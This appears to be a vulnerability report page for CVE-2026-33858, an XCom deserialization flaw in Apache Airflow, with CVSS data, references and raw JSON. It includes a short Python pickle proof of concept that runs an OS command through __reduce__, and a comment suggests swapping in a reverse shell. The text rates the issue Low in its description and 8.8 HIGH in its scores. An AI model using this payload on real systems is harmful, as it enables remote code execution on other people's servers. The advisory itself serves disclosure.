Security Vulnerability Report
CVE-2026-33858 CVSS 8.8 HIGH


Published: 2026-04-13 15:17:33
Last Modified: 2026-04-17 18:40:56

Description

Dag Authors, who normally should not be able to execute code in the webserver context, could craft an XCom payload causing the webserver to execute arbitrary code. Since Dag Authors are already highly trusted, the severity of this issue is Low. Users are recommended to upgrade to Apache Airflow 3.2.0, which resolves this issue.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - VULNERABLE
Apache Airflow >= 3.1.8, < 3.2.0 (per the configuration record: versionStartIncluding 3.1.8, versionEndExcluding 3.2.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC for CVE-2026-33858
# This script demonstrates how a malicious DAG author might craft an XCom payload.
# Note: Actual exploitation depends on specific deserialization mechanisms in Airflow.
import pickle
import os


class MaliciousPayload:
    def __reduce__(self):
        # Command to execute (e.g., create a file or reverse shell)
        return (os.system, ('touch /tmp/pwned',))


# Serialize the malicious object
evil_data = pickle.dumps(MaliciousPayload())

# In a real scenario, this 'evil_data' would be pushed via xcom_push
print(f"Malicious XCom payload generated: {evil_data}")

# Example usage in a DAG (Conceptual):
# def push_malicious_xcom(**context):
#     context['task_instance'].xcom_push(key='exploit', value=evil_data)
```

References

- https://github.com/apache/airflow/pull/64148 (Issue Tracking)
- https://lists.apache.org/thread/1npt3o2x81s0gw9tmfcv4n7p1z9hdmy0 (Mailing List, Vendor Advisory)
- http://www.openwall.com/lists/oss-security/2026/04/13/7 (Mailing List, Third Party Advisory)

Weakness: CWE-502 (Deserialization of Untrusted Data)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33858",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-13T15:17:33.343",
    "lastModified": "2026-04-17T18:40:56.003",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Dag Authors, who normally should not be able to execute code in the webserver context could craft XCom payload causing the webserver to execute arbitrary code. Since Dag Authors are already highly trusted, severity of this issue is Low.\n\n\nUsers are recommended to upgrade to Apache Airflow 3.2.0, which resolves this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.1.8",
                "versionEndExcluding": "3.2.0",
                "matchCriteriaId": "99AE110A-CD12-4E42-AD9A-9FDA4940E6E2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/apache/airflow/pull/64148",
        "source": "[email protected]",
        "tags": ["Issue Tracking"]
      },
      {
        "url": "https://lists.apache.org/thread/1npt3o2x81s0gw9tmfcv4n7p1z9hdmy0",
        "source": "[email protected]",
        "tags": ["Mailing List", "Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/04/13/7",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List", "Third Party Advisory"]
      }
    ]
  }
}
```